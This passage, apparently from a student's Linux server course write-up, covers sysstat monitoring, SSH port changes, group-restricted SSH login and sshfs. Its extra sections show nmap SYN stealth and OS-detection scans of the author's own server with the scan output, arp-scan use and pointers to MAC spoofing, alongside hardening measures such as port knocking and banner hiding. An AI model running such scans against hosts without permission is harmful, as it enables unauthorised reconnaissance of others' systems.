pidstat_stats_pagefaults | Page fault statistics | +| pidstat_stats_stacks | Process stack statistics | + +(Check. [Stacks](https://stackoverflow.com/questions/8905271/what-is-the-linux-stack), [Page fault](https://en.wikipedia.org/wiki/Page_fault)) + +Additionally, iostat command was run on the background. + +4. Let's take a closer look on two sar analytics files and I/O statistics file. The following commands open analytics files in more detailed view. + +------------------------------------------------ + +**SAR network statistics - IPv4 traffic** +**command: sar -n IP -f sar-stats_2018-02-24_2018-02-26.file** + +![sar-stats-ipv4](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/sar-stats_ipv4.png) + +**Observation period:** 24.-26.02.2018 + +| Field | Description | Average | +|-------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------| +| Left column | Record time | | +| irec/s | The total number of input datagrams received from interfaces per second, including those received in error. | 1.33 | +| fwddgm/s | The number of input datagrams per second, for which this entity was not their final IP destination, as a result of which an attempt was made to find a route to forward them to that final destination. | 0.00 | +| idel/s | The total number of input datagrams,successfully,delivered,per,second,to,IP user-protocols (including ICMP). | 1.30 | +| orq/s | The total number of IP datagrams which local IP user-protocols (including ICMP) supplied per second to IP in requests for,transmission. Note that this,counter,does,not include any datagrams counted in fwddgm/s. | 1.45 | +| asmrq/s | The number of IP fragments received per second which needed to be reassembled at this entity. | 0.00 | +| asmok/s | The number of IP datagrams successfully re-assembled per second. | 0.00 | +| fragok/s | The number of IP datagrams that,have,been,successfully fragmented at this entity per second. | 0.00 | +| fragcrt/s | The number of IP datagram fragments that have been generated per second as a result of fragmentation at this entity. | 0.00 | + +**NOTE!** Descriptions are provided in sysstat package (manpages). + +**ANALYSIS - IPV4** + +The server computer has not forwarded a single datagram in the observation period. Input network traffic has been received which can be concluded by observing _irec/s_, _idel/s_ and _orq/s_ field values. The current workload of the server computer is very low, including only HTTP daemon (Apache web server) and SSH server daemon. No webpages are available on the server which could increase input HTTP/HTTPS protocol based traffic. HTTPS was not enabled in the server computer. + +By default, the server computer allows 128 simultaneous input network connections (command 'cat /proc/sys/net/core/somaxconn'. NOTE!: The value can be changed by issuing 'echo 1024 | sudo tee /proc/sys/net/core/somaxconn', for example). + +MTU value of the web server computer for network interface eth0 was 1500 (you can check it with 'ifconfig' command). MTU stands for 'Maximum Transmission Unit' which determines the highest PDU unit ([Protocol Data Unit](https://en.wikipedia.org/wiki/Protocol_data_unit)) that can be transferred over the network at once. + +Check also + +- [MTU - hyperlink 1](http://www.tcpipguide.com/free/t_IPDatagramSizeMaximumTransmissionUnitMTUFragmentat.htm) + +- [MTU - hyperlink 2](https://en.wikipedia.org/wiki/Maximum_transmission_unit) + +- [Stack Overflow - What's the practical limit on the size of single packet transmitted over domain socket?](https://stackoverflow.com/questions/21856517/whats-the-practical-limit-on-the-size-of-single-packet-transmitted-over-domain) + +- [Stack Overflow - What is the default size of datagram queue length in Unix Domain Sockets (AF_UNIX)? Is it configurable?](https://stackoverflow.com/questions/21448960/what-is-the-default-size-of-datagram-queue-length-in-unix-domain-sockets-af-uni) + +- [IP fragmentation](https://en.wikipedia.org/wiki/IP_fragmentation) + +- Related article: [Linux Tune Network Stack (Buffers Size) To Increase Networking Performance](https://www.cyberciti.biz/faq/linux-tcp-tuning/) + +**NOTE!** About datagrams, [quoted from Wikipedia](https://en.wikipedia.org/wiki/Datagram#Internet_Protocol): + +> The term datagram is often considered synonymous to packet but there are some nuances. The term datagram is generally reserved for packets of an unreliable service, which cannot notify the sender if delivery fails, while the term packet applies to any packet, reliable or not. Datagrams are the IP packets that provide a quick and unreliable service like UDP, and all IP packets are datagrams; however, at the TCP layer, what is termed a TCP segment is the sometimes necessary IP fragmentation of a datagram, but those are referred to as "packets". + +------------------------------------------------ + +**SAR - memory consumption statistics - RAM & SWAP** +**command: sar -r -f sar-stats_2018-02-24_2018-02-26.file** +**command: sar -S -f sar-stats_2018-02-24_2018-02-26.file** + +![sar-stats-memusage](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/sar-stats_memusage.png) + +**Observation period:** 24.-26.02.2018 + +NOTE! Average values are not visible in the attached picture! + +| Field | Description | Average | +|-------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------| +| Left column | Record time | | +| kbmemfree | Amount of free memory available in kilobytes. | 87631 KB (~ 87 MB) | +| kbmemused | Amount,of,used,memory in kilobytes. This does not take into account memory used by the kernel itself. | 928 457 KB (~ 928 MB) | +| %memused | Percentage of used memory. | 91.38 % | +| kbbuffers | Amount of memory used as buffers by the kernel in kilobytes. | 77 746 KB (~ 77 MB) | +| kbcached | Amount of memory used to cache data by the kernel in kilobytes. | 644 777 KB (~ 644 MB) | +| kbcommit | Amount of memory in kilobytes needed for current workload. This is an estimate of how much RAM/swap is needed to guarantee that there never is out of memory. | 470 619 KB (~ 470 MB) | +| %commit | Percentage of memory needed for current workload in relation to the total amount of memory (RAM+swap).,This number may be greater than 100% because the,kernel,usually overcommits memory. | 46.32 % | +| kbactive | Amount of active memory in kilobytes (memory that has been used more recently and usually not reclaimed unless absolutely necessary). | 468 703 KB (~ 468 MB) | +| kbinact | Amount of inactive memory in kilobytes (memory which has been less recently used. It is more eligible to be reclaimed for other purposes). | 301 098 KB (~ 301 MB) | +| kbdirty | Amount of memory in kilobytes waiting to get written back to the disk. | 254 KB (0.254 MB) | + +**NOTE!** Descriptions are provided in sysstat package (manpages). + +**ANALYSIS - MEMORY STATISTICS** + +The target server memory size: + +``` +[newuser@goauldhost: ~ ]$ cat /proc/meminfo | grep -i memtotal +MemTotal: 1016088 kB +``` + +i.e. approximately ~ 1016 MB. + +Great part of this memory were in use during the observation period. There were multiple active processes running on the server computer during the period, thus increased workload was intended and meant for statistics collection. + +The web server didn't have Swap partition or Swap file. This can be found out by + +- executing command 'for i in "cat /etc/fstab" "sudo fdisk -l"; do $i | grep -i swap; echo $?; done' which returns value 1 two times (meaning returning of 'false' boolean value to shell two separate times) + +- Or, for example: + +``` +[newuser@goauldhost: ~ ]$ cat /etc/fstab +LABEL=cloudimg-rootfs / ext4 defaults 0 0 +LABEL=UEFI /boot/efi vfat defaults 0 0 + +[newuser@goauldhost: ~ ]$ sudo fdisk -l +[sudo] password for newuser: +Disk /dev/vda: 25 GiB, 26843545600 bytes, 52428800 sectors +Units: sectors of 1 * 512 = 512 bytes +Sector size (logical/physical): 512 bytes / 512 bytes +I/O size (minimum/optimal): 512 bytes / 512 bytes +Disklabel type: gpt +Disk identifier: 39DFE5D0-C8FB-44D8-93F8-EBB37A54BDF8 + +Device Start End Sectors Size Type +/dev/vda1 227328 52428766 52201439 24.9G Linux filesystem +/dev/vda14 2048 10239 8192 4M BIOS boot +/dev/vda15 10240 227327 217088 106M Microsoft basic data +``` + +It may not be wise to collect Swap statistics (although Linux kernel [Swappiness value](https://en.wikipedia.org/wiki/Swappiness) has default value 60 defined in file '/proc/sys/vm/swappiness' in DigitalOcean virtual servers). + +------------------------------------------------ + +**I/O statistics** + +![sar-iostat](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/sar-iostats.png) + +Main command: iostat -dmtx 20 + +-d Display the device utilization report. +-m Display statistics in megabytes per second. +-t Print the time for each report displayed. +-x Display extended statistics. +20 20 sec interval. + +| Field | Description | +|--------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| Device | Device or partition defined in system directory '/dev'. | +| rrqm/s | The number of read requests merged per second that were queued to the device. | +| wrqm/s | The percentage of write requests merged together before being sent to the device. | +| r/s | The number (after merges) of read requests completed per second for the device. | +| w/s | The number (after merges) of write requests completed per second for the device. | +| rMB/s | The number of sectors (KB, MB) read from the device per second. | +| wMB/s | The number of sectors (KB, MB) write from the device per second. | +| avgrq-sz (areq-sz) | The average size (in kilobytes) of the I/O requests,that were issued to the device. | +| avgqu-sz (aqu-sz) | The average queue length of the requests that were issued to the device. | +| await | The average time (ms) for I/O requests issued to the device to be served. This includes the time spent by the requests in queue and the time spent servicing them. | +| r_await | The average time (ms) for read requests issued to the device to be served. This includes the time spent by the requests in queue and the time spent servicing them. | +| w_await | The average time (ms),for,write,requests issued to the device to be served. This includes the time spent by the requests in queue and the time spent servicing them. | +| svctm | The average service time (ms) for I/O requests that were issued to the device. This field will be removed in a future sysstat version. | +| %util | Percentage of elapsed time during which I/O requests were issued to the device (bandwidth utilization for the device). Device saturation occurs when this value is close to 100% for devices serving requests serially. But for devices serving requests in parallel, such as RAID arrays and modern SSDs, this number does not reflect their performance limits. | + +**NOTE!** Descriptions are provided in sysstat package (manpages). + +**ANALYSIS - I/O STATISTICS** + +Virtual partition '/dev/vda' were hibernated most of the time during the observation period. Little variation can be seen in writing requests (wrqm/s), in succeeded writing requests (w/s) and in written sector count (wMB/s). Average sector size is 10-20 sectors (avgrq-sz) which is quite little. I/O and read request service times are mostly 0.0. Workload of the virtual hard drive is low during the observation period. + +------------------------------------------------ + +In addition to sysstat, 'top' command could have been used in some TTY session in order to observe processes in real time, and with [inotify](https://en.wikipedia.org/wiki/Inotify), some file system changes could have been reported. Sysstat's advantage is that programs which are included in it can record and save analytics in binary format for further and detailed inspection. + +**e)** (optional) Change sshd (SSH server process) port +-------------- + +**Answer:** + +Let the following shell script do the job... + +``` +#!/bin/bash + +# SSH server daemon configuration file in the system +SSH_CONFIG=/etc/ssh/sshd_config + +# New SSH server daemon input port as user input value. +NEW_SSH_PORT=$1 + +[[ -f $SSH_CONFIG ]] \ +&& sed -i "s/.*Port.*/Port $NEW_SSH_PORT/" $SSH_CONFIG && echo "SSH server: new port $NEW_SSH_PORT is set." \ +|| echo "SSH server configuration file could not be found!" + +if [[ $(cat $SSH_CONFIG | grep -i port | awk '{print $2}') == $NEW_SSH_PORT ]]; then + echo -e "SSH server input port has been changed to $NEW_SSH_PORT.\n \ +Restarting SSH server daemon in order to apply the changes (root required)." + + sudo systemctl restart sshd.service + + if [[ $? == 0 ]]; then + echo "SSH server daemon restarted, new input port is $NEW_SSH_PORT." + else + echo "Something went wrong while restarting SSH server daemon. Execute 'systemctl status sshd.service' \ +to get more information about the problem." + fi +fi +``` + +Save the above script code in file '$HOME/ssh-port.sh', for example. Change the port with command 'bash $HOME/ssh-port.sh 4312' where the number value is your new SSH port (4312 in this case). + +------------------------------------------------ + +**EXTRA - Using new port address of SSH server daemon when connecting with a client computer/program** + +Changing SSH server input port on the server computer must be taken into account while establishing connection with a client computer. Because the default SSH port 22 is not used anymore, the following syntax must be applied while connecting to the SSH server computer: + +``` +[19/02/2018 23:23:49 - fincer: ~ ]$ ssh newuser@174.138.2.190 -p +``` + +------------------------------------------------ + +**EXTRA - detecting SSH port change with port scanning techniques (nmap)** + +Enable log level VERBOSE in '/etc/ssh/sshd_config' configuration file (LogLevel VERBOSE), restart SSH server daemon with command 'sudo systemctl restart sshd.service' and try port scanning with another computer. + +Port scanning: + +``` +nmap -sS -F -v -O 174.138.2.190 +``` + +nmap output when port scanning is applied with another computer using target IP 174.138.2.190 and port 1234 (note! This scanning has been applied to my own server only _once_ as an experiment, not in bad intentions! Make sure you have permission to proceed with your scanning and do not attack to any server just for fun, to avoid any problems!): + +``` +phelenius@my-machine:~$ sudo nmap -sS -p 1234 -O -v 174.138.2.190 + +Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-19 20:02 EET +Initiating Ping Scan at 20:02 +Scanning 174.138.2.190 [4 ports] +Completed Ping Scan at 19:59, 0.20s elapsed (1 total hosts) +Initiating Parallel DNS resolution of 1 host. at 20:02 +Completed Parallel DNS resolution of 1 host. at 20:02, 0.01s elapsed +Initiating SYN Stealth Scan at 20:02 +Scanning 174.138.2.190 [1 port] +Completed SYN Stealth Scan at 20:02, 0.20s elapsed (1 total ports) +Initiating OS detection (try #1) against 174.138.2.190 +adjust_timeouts2: packet supposedly had rtt of -125997 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of -125997 microseconds. Ignoring time. +Retrying OS detection (try #2) against 174.138.2.190 +adjust_timeouts2: packet supposedly had rtt of -150518 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of -150518 microseconds. Ignoring time. +WARNING: OS didn't match until try #2 +Nmap scan report for 174.138.2.190 +Host is up (0.00041s latency). +PORT STATE SERVICE +1234/tcp open unknown +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: switch|general purpose|media device +Running: Cisco CatOS 7.X|8.X, HP Tru64 UNIX 5.X, Vantage embedded +OS CPE: cpe:/h:cisco:catalyst_ws-c6506 cpe:/o:cisco:catos:7.6 cpe:/o:cisco:catos:8.3 cpe:/o:hp:tru64:5.1a cpe:/h:vantage:hd7100s +OS details: Cisco Catalyst WS-C6506 switch (CatOS 7.6(16)), Cisco Catalyst switch (CatOS 8.3(2)), HP Tru64 UNIX 5.1A, Vantage HD7100S satellite receiver + +Read data files from: /usr/bin/../share/nmap +OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 3.39 seconds + Raw packets sent: 44 (6.312KB) | Rcvd: 18 (1.820KB) +``` + +If SSH server uses the default input port 22, the following is likely to be presented in output of 'nmap' command (unless you've defined a particular port to be scanned in your 'nmap' command, like port 1234): + +``` +PORT STATE SERVICE +22/tcp filtered ssh +``` + +Corresponding log entries of targeted SSH server during the nmap scanning (/var/log/auth.log): + +``` +Feb 19 18:02:46 goauldhost sshd[30057]: Connection from XXX.XXX.XXX.XXX port 6967 on 174.138.2.190 port 1234 +Feb 19 18:02:46 goauldhost sshd[30057]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:46 goauldhost sshd[30058]: Connection from XXX.XXX.XXX.XXX port 52205 on 174.138.2.190 port 1234 +Feb 19 18:02:46 goauldhost sshd[30058]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30059]: Connection from XXX.XXX.XXX.XXX port 25326 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30059]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30060]: Connection from XXX.XXX.XXX.XXX port 32812 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30060]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30061]: Connection from XXX.XXX.XXX.XXX port 17024 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30061]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30062]: Connection from XXX.XXX.XXX.XXX port 53268 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30062]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30063]: Connection from XXX.XXX.XXX.XXX port 34923 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30063]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30064]: Connection from XXX.XXX.XXX.XXX port 14489 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30064]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30065]: Connection from XXX.XXX.XXX.XXX port 40086 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30065]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:47 goauldhost sshd[30066]: Connection from XXX.XXX.XXX.XXX port 38147 on 174.138.2.190 port 1234 +Feb 19 18:02:47 goauldhost sshd[30066]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:48 goauldhost sshd[30067]: Connection from XXX.XXX.XXX.XXX port 49215 on 174.138.2.190 port 1234 +Feb 19 18:02:48 goauldhost sshd[30067]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:48 goauldhost sshd[30068]: Connection from XXX.XXX.XXX.XXX port 34445 on 174.138.2.190 port 1234 +Feb 19 18:02:48 goauldhost sshd[30068]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:48 goauldhost sshd[30069]: Connection from XXX.XXX.XXX.XXX port 4600 on 174.138.2.190 port 1234 +Feb 19 18:02:48 goauldhost sshd[30069]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:48 goauldhost sshd[30070]: Connection from XXX.XXX.XXX.XXX port 59405 on 174.138.2.190 port 1234 +Feb 19 18:02:48 goauldhost sshd[30070]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:48 goauldhost sshd[30071]: Connection from XXX.XXX.XXX.XXX port 7848 on 174.138.2.190 port 1234 +Feb 19 18:02:48 goauldhost sshd[30071]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:49 goauldhost sshd[30072]: Connection from XXX.XXX.XXX.XXX port 5206 on 174.138.2.190 port 1234 +Feb 19 18:02:49 goauldhost sshd[30072]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:50 goauldhost sshd[30073]: Connection from XXX.XXX.XXX.XXX port 5517 on 174.138.2.190 port 1234 +Feb 19 18:02:50 goauldhost sshd[30073]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:50 goauldhost sshd[30074]: Connection from XXX.XXX.XXX.XXX port 3970 on 174.138.2.190 port 1234 +Feb 19 18:02:50 goauldhost sshd[30074]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:50 goauldhost sshd[30075]: Connection from XXX.XXX.XXX.XXX port 38690 on 174.138.2.190 port 1234 +Feb 19 18:02:50 goauldhost sshd[30075]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:50 goauldhost sshd[30076]: Connection from XXX.XXX.XXX.XXX port 50572 on 174.138.2.190 port 1234 +Feb 19 18:02:50 goauldhost sshd[30076]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:50 goauldhost sshd[30077]: Connection from XXX.XXX.XXX.XXX port 27830 on 174.138.2.190 port 1234 +Feb 19 18:02:50 goauldhost sshd[30077]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:50 goauldhost sshd[30078]: Connection from XXX.XXX.XXX.XXX port 49371 on 174.138.2.190 port 1234 +Feb 19 18:02:50 goauldhost sshd[30078]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30079]: Connection from XXX.XXX.XXX.XXX port 36802 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30079]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30080]: Connection from XXX.XXX.XXX.XXX port 50546 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30080]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30081]: Connection from XXX.XXX.XXX.XXX port 43542 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30081]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30082]: Connection from XXX.XXX.XXX.XXX port 56108 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30082]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30083]: Connection from XXX.XXX.XXX.XXX port 6399 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30083]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30084]: Connection from XXX.XXX.XXX.XXX port 55980 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30084]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30085]: Connection from XXX.XXX.XXX.XXX port 12713 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30085]: Did not receive identification string from XXX.XXX.XXX.XXX +Feb 19 18:02:51 goauldhost sshd[30086]: Connection from XXX.XXX.XXX.XXX port 5026 on 174.138.2.190 port 1234 +Feb 19 18:02:51 goauldhost sshd[30086]: Did not receive identification string from XXX.XXX.XXX.XXX + +``` + +The server computer has logged invalid nmap connection requests. In this case, we have defined the known SSH connection port number 1234 in our 'nmap' command on the client computer (which is INPUT port at the server end, OUTPUT port at the client end). + +You may check suggested countermeasures against port scanners on [Unix & Linux Stack Exchange](https://unix.stackexchange.com/questions/345114/how-to-protect-against-port-scanners/407904#407904). Does these measures interfere negatively to other network traffic in busy server environments? This depends on which ports (read: server daemon programs/services) are targets of your countermeasures. + +Another 'nmap' command shows us the following: + +``` +phelenius@my-machine:~$ sudo nmap 174.138.2.190 -sV + +Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-20 14:50 EET +Nmap scan report for 174.138.2.190 +Host is up (0.33s latency). +Not shown: 998 filtered ports +PORT STATE SERVICE VERSION +1234/tcp open ssh OpenSSH 7.6 (protocol 2.0) +80/tcp open http +... +``` + +... which reveals the actual service behind our new-defined port 1234/tcp to an attacker. In addition, the attacker can get more information about the server system, especially on Debian-based Linux distributions. For example: + +``` +... +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) +... +``` + +This information can be hidden by adding line _DebianBanner no_ in '/etc/ssh/sshd_config' on Debian-based Linux systems and restarting the SSH server daemon with command 'sudo systemctl restart sshd.service' + +**NOTE!** Port scanning does not leave any log traces behind in Apache's access.log file ('/var/log/apache/access.log')! + +Check also + +- [MyPapit GNU/Linux - How to Hide OpenSSH Ubuntu version from Nmap and other scanners](https://blog.mypapit.net/2015/08/how-to-hide-openssh-ubuntu-release-from-nmap-and-other-scanners.html) + +- [serverfault.com - How to hide web server name and openssh version on linux when scanning server ports?](https://serverfault.com/questions/81690/how-to-hide-web-server-name-and-openssh-version-on-linux-when-scanning-server-po/81697#81697) + +- [Unix & Linux Stack Exchange - Change SSH banner which is grabbed by netcat](https://unix.stackexchange.com/questions/269024/change-ssh-banner-which-is-grabbed-by-netcat/269027#269027) + +- [GitHub - metacloud/openssh - Include the Debian version in our identification](https://github.com/metacloud/openssh/blob/master/debian/patches/package-versioning.patch) + +------------------------------------------------ + +**EXTRA - Using Port Knocking technique against port scanning** + +Nmap requests are targeted to layer 3 (Network Layer) in OSI model. Additional security measures can be taken by applying [Port Knocking login techniques](https://wiki.archlinux.org/index.php/Port_knocking) on the server computer. + +**WARNING!** The following 'Knockd daemon' may break easily. Thus it can not be recommended for critical or rapidly updating server environments. For instance, dhcpcd version 7 or above breaks knockd daemon. Many users have had problems to start the daemon service during server boot-up process. Knockd assumes that you have a preconfigured network interface with established network connection (this is not 100% valid information but this is my best guess). + +[DigitalOcean, "Port Knocking" - Ubuntu, knockd](https://www.digitalocean.com/community/tutorials/how-to-use-port-knocking-to-hide-your-ssh-daemon-from-attackers-on-ubuntu): + +Dynamic firewall rules are manually applied to the server (iptables, for instance) or separate daemon process ([for instance, knockd](http://www.zeroflux.org/projects/knock)) is set up on the server computer. Daemon process is used to open a pre-defined port only if a client program has knocked correct server port numbers in right order and using correct protocol, either TCP or UDP, and this all has been done in predefined time limit. Additionally, limited timeout for user log-in can be set. For example, a correctly authenticated user must log in in 10 seconds ater Knock daemon has opened a SSH port for that time period. When the time limit is reached, Knock daemon closes the port for any further connection attempts unless the knock port sequence is re-applied. + +Knocking technique must be configured so that firewall does not close already established connections (like SSH in our case), but refuses any further connection attempts so that the port can not be detected with nmap port scanning techniques after the time limit has been reached. + +[DigitalOcean, "Port Knocking" - FWKnop - Single packet authentication](https://www.digitalocean.com/community/tutorials/how-to-use-fwknop-to-enable-single-packet-authentication-on-ubuntu-12-04): + +Some more or less secure implementations for port knocking exist. Various encryption methods can be applied to the knocking technique, making it more difficult for an attacker to sniff network packets between a server and a client. One solution using encyption methods is [fwknop](http://www.cipherdyne.org/fwknop/) which uses _Single Packet Authorization_ (SPA) method instead of insecure port sequences. + +More about Port Knocking technique: + +- [Improved Port Knocking with Strong Authentication - Rennie deGraaf, John Aycock, and Michael Jacobson, Jr.∗ (Department of Computer Science - University of Calgary)](https://www.acsac.org/2005/papers/156.pdf) + +- [OpenWRT:n sivut](https://wiki.openwrt.org/doc/howto/portknock.server) + +- [portknocking.org](http://www.portknocking.org/) and practical solutions on [Implementations sub-page](http://www.portknocking.org/view/implementations) + +- [Information Security Stack Exchange - Port Knocking is it a good idea?](https://security.stackexchange.com/questions/1194/port-knocking-is-it-a-good-idea/1196#1196) + +**NOTE!** Port Knocking technique must not be applied to block ports of server daemon processes which are required to be always reachable from a client program (take Apache server for example). For SSH which does not require 24/7 connection, port knocking techniques can be applied more reliably. In addition to public key, password and PAM authentication methods, port knocking adds one more security layer to the stack. However, you must not apply these security countermeasures individually but use them together, instead. **The goal is to make it more difficult for an attacker to penetrate your network security.** + +------------------------------------------------ + +**EXTRA - ARP Scan and spoofing your MAC address** + +Program [arp-scan](https://www.blackmoreops.com/2015/12/31/use-arp-scan-to-find-hidden-devices-in-your-network/) can be used in limited scale to scan a MAC address (OSI model layer 2, Data Link Layer) in a network. + +Unique MAC address of a network interface (network card) can programmatically be spoofed with [these Arch Wiki instructions](https://wiki.archlinux.org/index.php/MAC_address_spoofing#Method_1:_systemd-networkd) or with my [Spoof MAC Address shell script](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/spoof_mac_address.sh). + +Sample results of ARP Scan. + +BEFORE: + +``` +[20/02/2018 18:52:35 - fincer: ~ ]$ sudo arp-scan --interface=wlan0 --localnet +[sudo] password for fincer: +Interface: wlan0, datalink type: EN10MB (Ethernet) +Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) +A.B.C.D f4:0e:22:ad:b8:7d (Unknown) +1.2.3.4 18:a9:05:4b:61:58 Hewlett-Packard Company +``` + +AFTER - IP-osoitteessa 1.2.3.4 olevan palvelinkoneen MAC-osoite muutettu: + +``` +[20/02/2018 18:54:28 - fincer: ~ ]$ sudo arp-scan --interface=wlan0 --localnet +Interface: wlan0, datalink type: EN10MB (Ethernet) +Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) +A.B.C.D f4:0e:22:ad:b8:7d (Unknown) +1.2.3.4 aa:0c:9a:fa:7b:d4 (Unknown) +``` + +The following warning messages may be expected after spoofing a MAC address and when you establish SSH connection from a local computer to your server: + +``` +Warning: Permanently added the ECDSA host key for IP address '[1.2.3.4]:22' to the list of known hosts. +``` + +**f)** (optional) Allow SSH login only for users in group 'sshers'. Add your account to this group. +-------------- + +**Answer:** + +1. Log in to the server computer ('ssh username@server-ip -p ') + +2. Add group 'sshers' with GID number 876 (you don't have to define GID here) + +``` +sudo groupadd -g 876 sshers +``` + +3. You can confirm existence of the created group with command 'grep sshers /etc/group'. Output: + +``` +sshers:x:876: +``` + +4. Add the current user (read: yourself) _newuser_ into this group + +``` +sudo usermod -aG sshers newuser +``` + +5. Command 'grep sshers /etc/group' output now: + +``` +sshers:x:876:newuser +``` + +You can alternatively check groups of _newuser_ by executing command 'groups' while being that user: + +``` +[27/02/2018 10:39:58 - newuser@goauldhost: ~ ]$ groups +sshers newuser sudo +``` + +or using command 'sudo -u newuser groups" as any system user who can execute commands with sudo. + +**NOTE!** _groups_ -komento antaa oikean stdout:n (outputin) vasta uudelleenkirjautumisen jälkeen. + +command 'groups' gives correct output only after re-login. + +6. Allow SSH login only to members of the group 'sshers'. + +Manual page of 'sshd_config' ('man sshd_config') describes 'AllowGroups' option as follows: + +> AllowGroups +> This keyword can be followed by a list of group name patterns, separated by spaces. If specified, login is allowed only for users whose primary group or supplementary group list matches one of the patterns. Only group names are valid; a numerical group ID is not recognized. By default, login is allowed for all groups. The allow/deny directives are processed in the following order: DenyUsers, AllowUsers, DenyGroups, and finally AllowGroups. + +Let's apply the following information into SSH server daemon configuration file '/etc/ssh/sshd_config': + +``` +PermitRootLogin no +AllowGroups sshers +``` + +And comment out the following lines (be careful here!): + +``` +# DenyUsers +# AllowUsers +# DenyGroups +``` + +If those lines are not defined in the configuration file, it is OK. + +You can add multiple groups and users after those keywords, as you like. + +For additional security, the following options can be applied as well (into '/etc/ssh/sshd_config' file), depending on your requests for SSH authentication policy: + +``` +IgnoreRhosts yes +PermitEmptyPasswords no +ChallengeResponseAuthentication yes +UsePAM yes +MaxAuthTries 3 +``` +etc. More options and configurations can be found with commands 'man sshd_config' and 'man sshd' + +7. Let's save this configuration and restart SSH server daemon by applying command 'sudo systemctl restart sshd.service' (NOTE! Disconnects already-established SSH connections!) + +8. Test SSH login with a client computer using remote user _newuser_ (belonging to the remote group 'sshers'). Command syntax is: 'ssh newuser@server-ip -p ' + +**g)** (optional) Attach a remote network directory with sshfs. +-------------- + +**Answer:** + +SSHFS stands for SSH File System. Corresponding program 'sshfs' has been developed to attach SSH server file systems (folders/files) remotely on a client computer so that all attached file systems can locally be browsed on the client computer. SSHFS uses encrypted SFTP protocol (SSH/Secure File Transfer Protocol) for file tranfers. + +1. Install 'sshfs' with command sequence 'sudo apt-get update && sudo apt-get -y install sshfs' on a Debian-based Linux system. + +2. Mount remote folder '/home/newuser/public_html/' (server), to path '/home//public_html_ssh_remote' on your client computer. + +``` +mkdir $HOME/public_html_ssh_remote && sshfs newuser@174.138.2.190:./public_html $HOME/public_html_ssh_remote -p +``` + +**NOTE!** If you use public key SSH authentication method, you are not asked for any password. + +3. Check that you have successfully mounted your remote server folder '/home/newuser/public_html' to the client computer (command 'ls ~/public_html_ssh_remote/'). Output should be as follows: + +``` +index.html +``` + +Additionally, check output of command 'mount | 